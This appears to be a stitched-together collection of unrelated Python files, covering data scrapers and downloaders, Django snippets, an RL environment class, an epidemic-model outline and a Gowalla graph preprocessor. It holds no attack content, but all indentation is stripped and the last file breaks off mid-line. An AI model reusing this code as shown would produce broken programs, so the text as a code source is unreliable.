06/03/2014 Natalie Moore Initial development/release
"""
import urllib2
import pytz
import pandas as pd
import datetime
import sys
import re
date=datetime.datetime.now(pytz.timezone('US/Eastern')).strftime('%Y-%m-%d') # holds the date in YYYY-MM-DD format
# stores report in variable 'site_contents'
url='http://www.ams.usda.gov/mnreports/gx_gr110.txt'
site_contents=urllib2.urlopen(url).read()
# Stores the names of the crops for the past 15 days in labels_15 and the names
# of the crops formatted to be used in the name of the quandl file in labels_15_names
labels_15=['Soybeans', 'Corn', 'Corn']
labels_15_names=['Soybeans', 'Corn (Terminal Elevator)', 'Corn (Processor)']
# Stores the names of the crops for the past 15-30 days in labels_30 and the names
# of the crops formatted to be used in the name of the quandl file in labels_30_names
labels_30=['SRW Wheat', 'Soybeans', 'Corn', 'Corn']
labels_30_names=['SRW Wheat', 'Soybeans', 'Corn (Terminal Elevator)', 'Corn (Processor)']
# This function takes in an index of a hyphen and returns the minimum and maximum bids
# Precondition: index is a valid index for a hyphen that separates two numerical values
def min_and_max(index):
space_before=site_contents.rfind(' ', 0, hyphen)
space_after=site_contents.find(' ', hyphen)
minimum_bid=site_contents[space_before:hyphen].strip()
maximum_bid=site_contents[hyphen+1:space_after].strip()
return [minimum_bid, maximum_bid]
ending_index=0 # used in the following loop for indexing, initialized to 0
# Loops through each crop in labels_15. Finds the minimum and maximum bids
# and formats for upload to quandl.
x=0
while x<len(labels_15):
ending_index=site_contents.find('Spot', ending_index+1) # bids occur before the word "Spot"
starting_index=site_contents.rfind(labels_15[x], 0, ending_index) # index of the crop name
hyphen=site_contents.find('-', starting_index) # index of the hyphen that separates the bids
bids=min_and_max(hyphen) # calls min_and_max and stores the minimum and maximum bids in list "bids"
bids=[float(y) for y in bids] # changes bid values to floats
headings=[ 'Date', 'Minimum Bid', 'Maximum Bid']
data={'Date': [date], 'Minimum Bid': [bids[0]], 'Maximum Bid': [bids[1]]}
data_df=pd.DataFrame(data, columns=headings)
data_df.index=data_df['Date']
data_df=data_df.drop('Date', 1)
replace = re.compile('[ /]') # list of characters to be replaced in the pork cut description
remove = re.compile('[,%#-&()!$+<>?/\'"{}.*@]') # list of characters to be removed from the pork cut description
name1 = replace.sub('_', labels_15_names[x].upper()) # replace certain characters with '_'
name2 = remove.sub('', name1).upper() # remove certain characters and convert to upper case
name2 = name2.translate(None, '-') # ensure '-' character is removed
quandl_code='USDA_GX_GR110_'+name2+'_SPOT\r'
reference_text = ' Historical figures from USDA can be verified using the LMR datamart located ' \
'\n at http://mpr.datamart.ams.usda.gov.\n'
print 'code: ' + quandl_code+'\n'
print 'name: Chicago Terminal Grain Report- Minimum and Maximum Bids (past 15 days)- '+labels_15_names[x]+'\n'
print 'description: Minimum and maximum bids up to the past 15 days for '+labels_15_names[x]+ \
' from the USDA GX_GR110 report published by the USDA Agricultural Marketing Service ' \
'(AMS). Prices represent $/bu. \n'\
+ reference_text+'\n'
print 'reference_url: http://www.ams.usda.gov/mnreports/gx_gr110.txt\n'
print 'frequency: daily\n'
print 'private: false\n'
print '---\n'
data_df.to_csv(sys.stdout)
print '\n'
print '\n'
x=x+1
ending_index=0 # initializes ending_index to 0
# Loops through each crop in labels_30. Finds the minimum and maximum bids
# and formats for upload to quandl.
x=0
while x<len(labels_30):
ending_index=site_contents.find('30 Days', ending_index+1) # bids occur before the string "30 Days"
starting_index=site_contents.rfind(labels_30[x],0, ending_index) # index of the crop name
hyphen=site_contents.find('-', starting_index) # index of the hyphen that seperates the bid values
bids=min_and_max(hyphen)
bids=[float(y) for y in bids]
headings=[ 'Date', 'Minimum Bid', 'Maximum Bid']
data={'Date': [date], 'Minimum Bid': [bids[0]], 'Maximum Bid': [bids[1]]}
data_df=pd.DataFrame(data, columns=headings)
data_df.index=data_df['Date']
data_df=data_df.drop('Date', 1)
replace = re.compile('[ /]') # list of characters to be replaced in the pork cut description
remove = re.compile('[,%#-&()!$+<>?/\'"{}.*@]') # list of characters to be removed from the pork cut description
name1 = replace.sub('_', labels_30_names[x].upper()) # replace certain characters with '_'
name2 = remove.sub('', name1).upper() # remove certain characters and convert to upper case
name2 = name2.translate(None, '-') # ensure '-' character is removed
quandl_code='USDA_GX_GR110_'+name2+'_30_DAY\r'
reference_text = ' Historical figures from USDA can be verified using the LMR datamart located ' \
'\n at http://mpr.datamart.ams.usda.gov.\n'
print 'code: ' + quandl_code+'\n'
print 'name: Chicago Terminal Grain Report- Minimum and Maximum Bids (Past 15-30 days)- '+labels_30_names[x]+'\n'
print 'description: Minimum and maximum bids for the past 15-30 days for '+labels_30_names[x]+ \
' from the USDA GX_GR110 report published by the USDA Agricultural Marketing Service ' \
'(AMS). Prices represent $/bu. \n'\
+ reference_text+'\n'
print 'reference_url: http://www.ams.usda.gov/mnreports/gx_gr110.txt\n'
print 'frequency: daily\n'
print 'private: false\n'
print '---\n'
data_df.to_csv(sys.stdout)
print '\n'
print '\n'
x=x+1
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
from os.path import join
import numpy as np
from collections import deque
import matplotlib.pyplot as plt
from gym.spaces.box import Box
class Env(object):
def __init__(self, **kwargs):
self.logger = kwargs.get('logger', logging.getLogger(__name__))
self.idx = kwargs.get('env_idx', 0) # NOTE: for creating multiple environment instances
# general setup
self.mode = kwargs.get('mode', 0) # NOTE: save frames when mode=1
if self.mode == 1:
try:
import scipy.misc
self.imsave = scipy.misc.imsave
except ImportError:
self.logger.warning("WARNING: scipy.misc not found, use plt.imsave")
self.imsave = plt.imsave
self.img_dir = join(kwargs.get('root_dir', '~'), "imgs")
self.logger.info("Frames will be saved to: " + self.img_dir)
self.frame_idx = 0
self.seed = kwargs.get('seed', 2020) + self.idx # NOTE: so to give a different seed to each instance
self.stack_len = kwargs.get('stack_len', 4)
self.solved_criteria = kwargs.get('solved_criteria', 100) # score
self.q_threhold = kwargs.get('q_threhold', 100) # threshold to justify whether soft-divergence has occured
self.episode_ended = False
# POMDP setup
self.pomdp = kwargs.get('pomdp', False)
self.pomdp_type = kwargs.get('pomdp_type', 'flickering')
self.pomdp_mask = np.array(kwargs.get('pomdp_mask', []))
self.pomdp_prob = kwargs.get('pomdp_prob', 0.5)
self._reset_experience()
def _reset_experience(self):
self.exp_action = None
self.exp_reward = None
self.exp_terminal1 = None
self.seq_state0 = deque(maxlen=self.stack_len)
self.seq_state1 = deque(maxlen=self.stack_len)
def _preprocessStates(self, states): # NOTE: padding zeros state if size is less than stack_len
if not states:
return np.zeros([self.stack_len, *self.state_shape])
states = np.array(states)
if states.shape[0] < self.stack_len:
states = np.append(np.zeros([self.stack_len - states.shape[0], *self.state_shape]), states, axis=0)
return states
def _get_experience(self):
return (self._preprocessStates(self.seq_state0), self.exp_action, self.exp_reward, self._preprocessStates(self.seq_state1), float(not self.exp_terminal1))
def render(self): # render using the original gl window
raise NotImplementedError()
def visual(self): # visualize onto visdom
raise NotImplementedError()
def reset(self):
raise NotImplementedError()
def step(self, action):
raise NotImplementedError()
@property
def state_shape(self):
raise NotImplementedError()
@property
def action_dim(self): # for now assuming discrete control
if isinstance(self.env.action_space, Box):
return self.env.action_space.shape[0]
else:
return self.env.action_space.n
|
from numpy import*
from numpy.linalg import*
mat=array([[8,3,1],[5,12,10],[1,3,2]])
v=array(eval(input("digite: ")))
v=v.T
q=dot(inv(mat),v.T)
print("ametista:",round(q[0],0))
print("esmeralda:",round(q[1],0))
print("safira:",round(q[2],0))
if(q[0]==max(q)):
print("ametista")
elif(q[1]==max(q)):
print("esmeralda")
else:
print("safira")
|
from ._ReportDynamicInfo import *
from ._Reset import *
from ._SetSpeedForPositionMovesPan import *
from ._SetAbsolutePositionPan import *
from ._SetAbsolutePositionTilt import *
from ._SetRelativePosition import *
from ._ReportStaticInfo import *
from ._SetAbsolutePosition import *
from ._HaltMotion import *
from ._SetSpeedForPositionMovesTilt import *
from ._SetVelocityTilt import *
from ._StartPositionControl import *
from ._SetVelocityPan import *
from ._StartVelocityControl import *
|
import sys
def getList(filename):
r = list()
with open(filename, 'r') as f:
for line in f:
line = line.replace(' ', '')
line = line.replace('\n', '')
s = line.split(':')
r.append((s[0], s[1]))
return r
def Sort2cmp(r):
r1 = sorted(r, key=lambda x: x[0])
r2 = sorted(r1, key=lambda x: int(x[1]), reverse=True)
return r2
f1 = sys.argv[1]
f2 = sys.argv[2]
r1 = getList(f1)
r2 = getList(f2)
r1 = Sort2cmp(r1)
r2 = Sort2cmp(r2)
if r1 == r2:
print("True")
else:
print("False")
|
## Author: Anne Ewing
## Date: 06/25/15
## Function: Outline for project population and disease model
### packages/modules ###
import csv
import sys
import networkx as nx
import numpy as np
### local modules ###
sys.path.append('/home/anne/Dropbox/Anne_Bansal_Lab')
### functions ###
import functions_chain_binomial_sim_pop_disease_model_v062515 as func
#import chain_binomial as sbfunc
## POPULATION ##
# 1
## pop of metropolitan areas and pop sizes (US)
## format: 2 columns (met_id, pop_size)
#metropop = csv.reader(open('/home/anne/Dropbox/Anne_Bansal_lab/SDI_Data/_______.csv', 'r'),delimiter = ',')
#
#d_pop_for_metro = func.import_metropop(metropop, 0, 1)
# 2
## connectivity btwn metro areas & # of travelers btwn them (US)
## format: edgelist - (met_id1, met_id2, # travelers)
# ex: G = networkx.read_edgelist()
metro_edges_travelers = 'Dropbox/Anne_Bansal_lab/Python_Scripts/Modeling_Project/air_traffic_data/air_traffic_edgelist.txt'
G = func.read_edgelist_anne(metro_edges_travelers)
print G.edges()
#contact_network = sbfunc.read_contact_network(metro_edges_travelers)
#metro_edges_travelers = csv.reader(open('/home/anne/Dropbox/Anne_Bansal_lab/Python_Scripts/Modeling_Project/air_traffic_data/air_traffic_edgelist.txt', 'rb'), delimiter='\t')
#metro_edges_travelers = open('/home/anne/Dropbox/Anne_Bansal_lab/Python_Scripts/Modeling_Project/air_traffic_data/air_traffic_edgelist.txt')
#
#
#for edge in metro_edges_travelers:
# print edge
#
#metro_edges_travelers.close()
#
#G = nx.read_edgelist('/home/anne/Dropbox/Anne_Bansal_lab/Python_Scripts/Modeling_Project/air_traffic_data/air_traffic_edgelist.txt', delimiter='\t', data=True)
#G = nx.read_edgelist(metro_edges_travelers, data=True)
#print G.nodes()
#G = nx.read_edgelist(metro_edges_travelers, nodetype=int, data=True)
#G = nx.read_weighted_edgelist(metro_edges_travelers, delimiter=None, create_using=None, nodetype=None, encoding='utf-8')
#print G.edges()
# 3a
## w/in met area, split into children/adults
### use same fraction of child/adults for each metro area
### determine fraction from entire US, fraction children out of only children & adult
### fraction children = alpha (a) = (#ch)/(#ch + #ad)
#### alt option - (find dif fraction for each metro area)
## data ##
# AGE SPLIT #
# POLYMOD contact study (Ref 22 in Apollini 2013)
## Children: (5 - 19) ?
## Adults: (20 - 59) ?
#popdata
#totalpop_age.csv
# import csv file of pop data
popdata = csv.reader(open('/home/anne/Dropbox/Anne_Bansal_lab/SDI_Data/totalpop_age.csv', 'r'),delimiter = ',')
zippopdata = csv.reader(open('/home/anne/Dropbox/Anne_Bansal_lab/SDI_Data/allpopstat_zip3_season_cl_nocodes.csv', 'r'),delimiter = ',')
# import data into dicts
d_pop_for_yr_age, ages, years = func.import_popdata(popdata, 0, 1, 2)
#group ages into children and adults
child = ['5-9 years', '10-14 years', '15-19 years']
adult = ['20-29 years', '30-39 years', '40-49 years', '50-59 years']
d_childpop, d_adultpop = func.pop_child_adult(d_pop_for_yr_age, years, child, adult)
#print d_childpop[2010]
#print d_adultpop[2010]
# set value of alpha from U.S. pop data
year = 2010 # decided to use pop from 2010 bc most recent
a = func.pop_child_frac(year, d_childpop, d_adultpop)
#print alpha # = 0.27 for 2010
#### calc alpha for each zip3 #####
# sensitivity analysis - look at variance across zip3s
season = 9
d_zip_popdata, zip_popdata = func.import_zip3_popdata(zippopdata, 0, 2, 3, 4)
#d_zip_popdata[(zip3, seas, age)] = pop
d_zip_alphas, alphas = func.zippop_child_frac(zip_popdata, season, d_zip_popdata)
#print len(alphas)
mean_alpha = np.mean(alphas)
std_alpha = np.std(alphas)
var_alpha = np.var(alphas)
#print var_alpha
#print std_alpha
#print mean_alpha
#print len(zip_popdata)
# 3b
## contact btwn children and adults
## 'C' = equation 3 in Apollini 2014
### alpha (a) = fraction of ch --> calc in 3a
### (n) = ratio of ad/ch avg # contacts
### (E) = avg fraction of contacts across age groups
#### --> from Euro data in Table 2 in Apollini 2013 + Ref 22
#Apollini 2013, Table 2, "Europe (average values)"
n = 0.79
E = 0.097
#q_1 = #see additional file of Apollini 2013
# Table 1 Mossong POLYMOD
# weighted avg for children and adults avg # of contacts
age = [5, 10, 15, 20, 30, 40, 50]
child = age[0:3]
adult = age[3:7]
contacts = [14.81, 18.22, 17.58, 13.57, 14.14, 13.83, 12.30]
participants = [661, 713, 685, 879, 815, 908, 906]
d_mean_contacts = dict(zip(age, contacts))
d_num_part = dict(zip(age, participants))
avg_q_ch = func.weighted_avg_q(child, d_mean_contacts, d_num_part)
avg_q_ad = func.weighted_avg_q(adult, d_mean_contacts, d_num_part)
#print avg_q_ad
#print d_num_part
#Apollini 2014 Eq 3
C_cc = ((a - E) / (a **2))
C_ca = (E / (a * (1 - a)))
C_ac = (E / (a * (1 - a)))
C_aa = (((n * (1 - a)) - E) / ((1 - a) **2))
# matrix
C_matrix = np.matrix([[C_cc, C_ca], [C_ac, C_aa]])
#print C_matrix
C = (C_matrix * avg_q_ch)
#print C
############################
## DISEASE ##
## Infc_list = [patient_Zero]
## Susc_list = [everyone_else]
## for t (time steps) in (1, 100):
## S --> I ?
## for s in susc:
## infect nodes with prob (1-e^-B(# of infec contacts)) # infected degree = #infected contacts
## I --> R ?
## for i in infc:
## recover with prob u
## (u = 0.1 - infectious period is 10 days)
|
from django.contrib import admin
from loginapp.models import UserProfileInfo, User
# Register your models here.
admin.site.register(UserProfileInfo)
|
import pip
import subprocess
import json
def install(name):
try:
subprocess.call(['pip3', 'install', name])
print "Successfully \n"
except ImportError:
print "Error in installing\n"
print "Fail in installing "
# Example
if __name__ == '__main__':
Dependencies = {
'beautifulsoup4' : '4.4.1',
'boto' : '2.48.0',
'bz2file' : '0.98',
'certifi' : '2017.7.27.1',
'chardet' : '3.0.4',
'gensim' : '2.3.0',
'html5lib' : '0.999',
'idna' : '2.5',
'nltk' : '3.2.4',
'numpy' : '1.13.1',
'pexpect' : '4.0.1',
'pip' : '9.0.1',
'ptyprocess' : '0.5',
'pyxdg' : '0.25',
'reportlab' : '3.3.0',
'requests' : '2.18.3',
'scipy' : '0.19.1',
'setuptools' : '20.7.0',
'six' : '1.10.0',
'smart-open' : '1.5.3',
'textblob' : '0.12.0',
'twitter' : '1.17.1',
'urllib3' : '1.22',
}
for Name in Dependencies:
print ("installing "+Name+" library :- \n")
install(Name) |
#!/usr/bin/env python3
"""Downloads historic temperature data from Berkeley Earth"""
from bs4 import BeautifulSoup
import mechanize
import os
import pandas as pd
import urllib.parse
CATEGORIES = ['TAVG', 'TMAX', 'TMIN']
BERK_URL = 'http://berkeleyearth.lbl.gov/auto/Regional/{}/Text/'
DL_DIR = 'downloaded'
CCODES_PATH = 'sources/country-regional-codes.csv'
def dl_category(cat, br, lookup=None):
"""
Download a category of data.
Args:
cat: Temperature data category (TAVG, TMAX, or TMIN).
br: mechanize.Browser to run web requests through.
lookup: Dictionary used for mapping country names to country codes
when a country name does not have a country code mapping, or has
multiple possible mappings.
Returns:
Updated lookup table.
"""
cat_url = BERK_URL.format(cat)
if lookup is None:
lookup = {}
# Request webpage with download links
br.open(cat_url)
resp = br.response()
# Find all file paths on the page
print('Fetching file paths...')
soup = BeautifulSoup(resp.read(), features='lxml')
trows = soup.find_all('tr')
paths = []
for tr in trows:
tcols = tr.find_all('td')
found = False
for td in tcols:
link = td.find('a')
if link is not None:
href = link['href']
ext = os.path.splitext(href)[1]
if ext == '.txt':
paths.append(href)
break
# Only include data files for countries
print('Filtering for countries...')
ccodes = pd.read_csv(CCODES_PATH, encoding='latin')
valid_names = []
for path in paths:
# Extract name of region
name = urllib.parse.unquote(path, encoding='latin')
region = []
for token in name.split('-'):
if token.upper() == cat.upper():
break
else:
region.append(token)
region = ' '.join(region)
# Search database for country name
rows = ccodes[ccodes['name'].str.match(region, case=False)]
num_rows = len(rows.index)
if num_rows == 1:
code = rows['alpha-3'].values.item()
valid_names.append((code, path))
else:
# Check lookup table for unknown country code.
# Then ask the user to specify a country code if the query
# resulted in multiple options.
key = region.lower()
if key in lookup:
code = lookup[key]
valid_names.append((code, path))
elif num_rows > 1:
codes = rows['alpha-3'].values
print('"{}" has multiple matches:'.format(region, ', '.join(codes)))
for i, c in enumerate(codes):
cname = rows['name'].values[i]
print(' ({}). {}, {}'.format(i, c, cname))
num = input('Enter a number (or nothing to skip): ')
if num.isdigit():
num = int(num)
if num >= 0 and num < len(codes):
code = codes[num]
valid_names.append((code, path))
# Update lookup table
lookup[region.lower()] = code
print()
per_rows = len(valid_names) / len(paths) * 100
print('{}/{} ({:.02f}%) of rows used'.format(len(valid_names), len(paths), per_rows))
# Download data for each valid country
if not os.path.exists(DL_DIR):
os.mkdir(DL_DIR)
for i, (code, name) in enumerate(valid_names):
url = urllib.parse.urljoin(cat_url, name)
br.open(url)
resp = br.response()
out_path = os.path.join(DL_DIR, '{}-{}.txt'.format(code, cat))
if (i + 1) % 50 == 0:
print('{}/{} files written'.format(i + 1, len(valid_names)))
with open(out_path, 'wb') as f:
f.write(resp.read())
print('All files downloaded for {}'.format(cat))
return lookup
if __name__ == '__main__':
# Open virtual browser
br = mechanize.Browser()
# Download data for each category
lookup = None
for cat in CATEGORIES:
print('Downloading data for {}...'.format(cat))
lookup = dl_category(cat, br, lookup)
print()
|
# Remove Dups: Write code to remove duplicates from an unsorted linked list. Follow-up: how would you solve this problem is a temporary buffer is not allowed?
from LinkedList import LinkedList, Node
def remove_dups(a: LinkedList) -> LinkedList:
# Build up all the data in the linked list
seen = []
remove = []
head = a.head
while head is not None:
if head.data not in seen:
seen.append(head.data)
else:
remove.append(head.data)
head = head.next
# Get rid of the duplicates (from the head working forwards)
head = a.head
while head is not None:
if head.next and head.next.data in remove:
remove.remove(head.next.data)
head.next = head.next.next # skip this item
else:
head = head.next
return a
# Though there object references are the same, their string representations should be identical
assert str(remove_dups(LinkedList(nodes=[1, 2, 3, 4, 5]))) == str(
LinkedList(nodes=[1, 2, 3, 4, 5])
)
assert str(remove_dups(LinkedList(nodes=[1, 1, 3, 4, 5]))) == str(
LinkedList(nodes=[1, 3, 4, 5])
)
assert str(remove_dups(LinkedList(nodes=[1, 2, 3, 5, 5]))) == str(
LinkedList(nodes=[1, 2, 3, 5])
)
assert str(remove_dups(LinkedList(nodes=[1, 2, 2, 2, 5]))) == str(
LinkedList(nodes=[1, 2, 5])
)
assert str(remove_dups(LinkedList(nodes=[1, 2, 3, 2, 5]))) == str(
LinkedList(nodes=[1, 3, 2, 5])
)
|
'''
Created on 2013-11-12
@author: Administrator
'''
from django.http import HttpResponse
from django.template import Context,loader
from poll.models import User
from django.shortcuts import render
from mydg.Count import Count
print '--------------1'
my_count=Count()
print '--------------2'
def index(request):
#return HttpResponse("index")
latest_poll_list=User.objects.all()
'''
template=loader.get_template('poll/index.html')
context=Context({
'latest_poll_list':latest_poll_list,})
return HttpResponse(template.render(context))
'''
#from mydg.wsgi import my_count
print '----------------poll/index'
context={'latest_poll_list':latest_poll_list,'count':my_count.count}
return render(request,'poll/index.html',context)
def detail(request,poll_id):
from django.http import Http404
try:
pass
except:
raise Http404
return HttpResponse("You are looking at detail p0ll %s" % poll_id)
def results(request,poll_id):
return HttpResponse("You are looking at p0ll results %s" % poll_id)
|
from math import *
a = int(input("entrer la valeur de l’entier a: "))
b = int(input("entrer la valeur de l’entier b: "))
signe = str(input("Veuillez choisir un opérateur parmi les suivants + ou - ou * ou /: "))
if signe == "+":
result = a + b
print("Le résultat de l’opération est :", result)
elif signe == "-":
result = a - b
print("Le résultat de l’opération est :", result)
elif signe == "*":
result = a * b
print("Le résultat de l’opération est :", result)
else:
result = int(a / b)
print("Le résultat de l’opération est :", result)
|
# Generated by Django 3.1.1 on 2020-10-17 09:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('hotelpackages', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='offers',
name='condition',
),
migrations.RemoveField(
model_name='offers',
name='offerdes',
),
migrations.RemoveField(
model_name='offers',
name='offertitle',
),
migrations.RemoveField(
model_name='offers',
name='ofimage',
),
]
|
from instance import *
from API.LaoMaoxsAPI import Download
from API import UrlConstants
class BOOK:
def __init__(self, BOOK_INFO):
self.book_info = BOOK_INFO
self.book_info_msg = BOOK_INFO.get('msg')
self.book_info_code = BOOK_INFO.get('code')
self.book_info_data = self.book_info.get('data')
self.save_dir = Vars.cfg.data.get('save_dir')
self.output_dir = Vars.cfg.data.get('output_dir')
self.book_info_data_list = []
def config_bookname(self):
return os.listdir(os.path.join('config', self.bookName))
def get_book_info(self):
if self.book_info_msg == 'ok':
self.bookid = self.book_info_data.get('book_id')
self.bookName = self.book_info_data.get('book_title')
self.novel_intro = self.book_info_data.get('book_desc')
self.authorName = self.book_info_data.get('book_author')
self.chapter_list = self.book_info_data.get('chapter_list')
self.lastUpdateTime = time.localtime(self.book_info_data.get('update_time'))
self.lastUpdateTime = time.strftime("%Y-%m-%d %H:%M:%S",self.lastUpdateTime)
self.book_type = self.book_info_data.get('book_type')
self.isFinish = self.book_info_data.get('book_status')
self.book_info_data_list.append(self.book_info_data)
return True
else:
return False
def book_show(self):
if self.get_book_info():
show_intro = "\n\n书名:{}\n序号:{}\n作者:{}\n分类:{}\n更新:{}".format(
self.bookName, self.bookid, self.authorName,
self.book_type, self.lastUpdateTime)
print(show_intro)
show_intro += "简介:{}\n".format(self.novel_intro)
"""建立文件夹和文件"""
self.os_file()
Download().ThreadPool(self.chapters(), self.book_info_data_list)
else:
self.book_info_msg
def chapters(self):
chapters_list = []
config_bookname = self.config_bookname()
for chapter_id_num, chapter_id in enumerate(range(len(self.chapter_list))):
"""跳过已经下载的章节"""
chapter_title = self.chapter_list[chapter_id_num]
if del_title(chapter_title) in ''.join(config_bookname):
# if self.chapter_list[chapter_id_num] in ''.join(self.config_bookname()):
# print(self.chapter_list[chapter_id_num], '已经下载过')
continue
url_num = int(int(self.bookid)/1000) # 书本编号等于bookid÷1000
chapters_list.append(UrlConstants.CHAP_CONTENT.format(url_num, self.bookid, chapter_id))
if len(chapters_list) == 0:
print("没有需要下载的章节")
else:
print('开始下载 {} ,一共剩余{}章'.format(self.bookName, len(chapters_list)))
return chapters_list
# 单线程
# for chapter_id_num, chapter_id in enumerate(track(range(len(self.chapter_list)))):
# url_num = int(int(self.bookid)/1000) # 书本编号等于bookid÷1000
# book_title = self.chapter_list[chapter_id_num]
# """跳过已经下载的章节"""
# if self.chapter_list[chapter_id_num] in ''.join(self.config_bookname()):
# print(self.chapter_list[chapter_id_num], '已经下载过')
# continue
# url = self.chapterurl.format(url_num, self.bookid, chapter_id)
# content = self.getUtil(url)['data']
# """跳过屏蔽章节"""
# if "\\n\\n 编辑正在手打中,稍后点击右上角刷新当前章节!" not in content:
# print(book_title)
# content_title = "\n\n{}\n{}".format(book_title, content_(content))
# self.write_txt(content_title, book_title, chapter_id_num)
# else:
# print(f"{self.chapter_list[chapter_id_num]}这是屏蔽章节,跳过下载")
# with open(os.path.join("Download", self.bookName + '.txt'), 'w', encoding='utf-8') as f:
# self.filedir()
# print(f'\n小说 {self.bookName} 下载完成')
def os_file(self):
self.main_path = os.getcwd() # 项目路径
# 创建Download文件夹
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
print(f'已在{self.main_path}创建{self.output_dir}文件夹')
# 创建config文件夹
if not os.path.exists(self.save_dir):
os.mkdir(self.save_dir)
print(f'已在{self.main_path}创建{self.save_dir}文件夹')
if not os.path.exists(os.path.join(self.save_dir, self.bookName)):
os.makedirs(os.path.join(self.save_dir, self.bookName))
|
'''
gow pre-process:
implement of merged gowalla data to spatial-temporal graph
'''
import time
import random
import pickle
import numpy as np
import pandas as pd
import networkx as nx
from tqdm import tqdm
from units import get_distance_hav
import warnings
warnings.filterwarnings("ignore")
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
pd.set_option('max_colwidth', 100)
cates = ['Coffee Shop', 'Sandwich Shop', 'Theatre']
gowalla_graph_num = np.zeros(700)
P = 0.01 # for calculating threshold
ghash_code_index = 'bcfguvyz89destwx2367kmqr0145hjnp'
geo_dict = dict(zip(ghash_code_index, range(32)))
friend_path = '../other_data/gowalla/gowalla_friendship.csv'
# Save path
sub_net_path = 'spatio-temporal net/gowalla/sub_net_'
n_feat_path = 'spatio-temporal net/gowalla/n_feat_'
e_feat_path = 'spatio-temporal net/gowalla/e_feat_'
label_path = 'spatio-temporal net/gowalla/label_'
def net_complete(): # Read the data and call other functional functions for processing
data_path = 'data_sort_by_cate.pkl' # the data sorted by category after merging data
merged_data = pd.read_pickle(data_path)
merged_data = merged_data[['userid', 'lng', 'lat', 't', 'geo']]
with open("spot_dict.pkl", 'rb') as f:
spot_id_dict = pickle.load(f) # The category corresponds to the number of rows that first appear
cate_keys = list(spot_id_dict.keys())
row_num = list(spot_id_dict.values())
for (index, key) in zip(range(len(cate_keys)), cate_keys):
if key not in cates:
continue
cate_sub_net_path = sub_net_path + str(index) + '.pkl'
cate_n_feat_path = n_feat_path + str(index) + '.pkl'
cate_e_feat_path = e_feat_path + str(index) + '.pkl'
cate_label_path = label_path + str(index) + '.pkl'
cate_save_path = [cate_sub_net_path, cate_n_feat_path, cate_e_feat_path, cate_label_path]
if index == len(cate_keys) - 1:
raw_data = merged_data.iloc[row_num[index][1]:]
else:
raw_data = merged_data.iloc[row_num[index][1]:row_num[index + 1][1]]
random.seed(30)
chosen = np.sort(random.sample(range(len(raw_data)), min(500000, len(raw_data))))
raw_data = raw_data.iloc[chosen]
pro_data = raw_data.drop_duplicates(keep='first') # Remove duplicated records
pro_data.sort_values(by="geo", inplace=True)
pro_data = pro_data.reset_index().iloc[:, 1:]
time_attr = pro_data['t']
t_min = time_attr.min()
t_max = time_attr.max()
time_index = []
for j in np.linspace(t_min, t_max, 11):
time_index.append(np.float(j))
time_index.remove(time_index[0])
print('read done:{}'.format(index))
print('num of record lines:{}'.format(len(pro_data)))
pro_data = np.array(pro_data.values).astype(np.str)
one_cate = Static_graph(pro_data)
sub_net_sampling(one_cate, time_index, cate_save_path, index)
def Static_graph(pro_data):
"""
:param pro_data: All Check records under the same location category (gowalla )
:return: G(networkx graph),time,gps
"""
friend_ship = pd.read_csv(friend_path)
friend_ship = np.array(friend_ship.values) # 转为numpy数组
g_tmp = nx.Graph()
g_tmp.add_edges_from(friend_ship)
user_id = list(pro_data[:, 0].astype(np.float))
gps = list(pro_data[:, [2, 1]].astype(np.float))
time = list(pro_data[:, -2].astype(np.float))
geo = list(pro_data[:, -1])
new_g_tmp = g_tmp.subgraph(user_id)
G = nx.DiGraph()
G.add_nodes_from(range(len(user_id)))
# transformed user name into an ID, record the corresponding check-in node
ud2rc = {} # user_id to record(node)
for (index, u) in zip(range(len(user_id)), user_id):
ud2rc.setdefault(u, []).append(index)
for u1 in tqdm(new_g_tmp.nodes()):
ner = list(new_g_tmp.neighbors(u1))
# Randomly select 35% of friends
# (https://www.businessinsider.com/35-percent-of-friends-see-your-facebook-posts-2013-8)
for u2 in random.sample(ner, int(0.35 * len(ner))):
for node1 in ud2rc[u1]:
for node2 in ud2rc[u2]:
d = get_distance_hav(gps[node1], gps[node2])
if time[node1] > time[node2]:
G.add_edge(node2, node1, weight=d)
else:
G.add_edge(node1, node2, weight=d)
print('Static Graph, node nums:{}, edge nums:{}'.format(G.number_of_nodes(), G.number_of_edges()))
return G, time, geo
def sub_net_sampling(args, time_index, save_path, cate_index):
# Converts a category's data into a spatial-temporal graph
net = args[0]
nodes_all = list(net.nodes)
time = np.array(args[1])
geo = np.array(args[2])
node_num = len(nodes_all)
sub_net = []
node_feature = []
edge_feature = []
label = []
random.seed(23)
chosen = np.sort(random.sample(net.nodes(), min(20000, int(node_num))))
# chosen = nodes_all
dup_dict = {}
net_index = 0
for i in tqdm(chosen): # 以i为中心的一个子图,产生K个序列子图
if geo[i] in dup_dict.keys():
continue
nodes = list(range(max(0, i-1000), min(i+1000, node_num)))
for j in reversed(nodes): # 去除不满足地理位置条件的点
if geo[j][:5] != geo[i][:5]:
nodes.remove(j)
dup_dict.setdefault(geo[i], []).append(net_index)
net_index += 1
sequence_net = []
sequence_feature = []
sequence_edge = []
sequence_label = []
for j in range(len(time_index)): # get rid of the points that don't satisfy the time condition
sub_nodes = nodes.copy()
for t in reversed(sub_nodes):
if time[t] > time_index[j] or (time[t] < time_index[j-1] if j != 0 else False):
sub_nodes.remove(t)
one_period_label = np.zeros(32)
one_period_feature = np.zeros((len(sub_nodes), 32))
for index, t in enumerate(sub_nodes):
if j == len(time_index) - 1:
one_period_label[geo_dict[geo[t][-1]]] += 1
one_period_feature[index, geo_dict[geo[t][-1]]] = 1
one_period_net = net.subgraph(sub_nodes)
mapping = dict(zip(one_period_net, range(len(one_period_net.nodes()))))
one_period_net = nx.relabel_nodes(one_period_net, mapping)
# get d (edge feature)
attr_tmp = list(one_period_net.edges.values())
attr_tmp = np.array([x['weight'] for x in attr_tmp])
if len(attr_tmp) > 0:
attr_min = attr_tmp.min()
attr_max = attr_tmp.max()
if attr_max != 0:
print(attr_max)
attr_tmp = [(x - attr_min) / ((attr_max - attr_min) if (attr_max - attr_min) else 1) for x in attr_tmp]
sequence_edge.append(attr_tmp)
# get net and feature
sequence_net.append(one_period_net)
sequence_feature.append(one_period_feature)
# get label
if j == len(time_index) - 1: # Record the last for the tag
thr = one_period_label.mean() + \
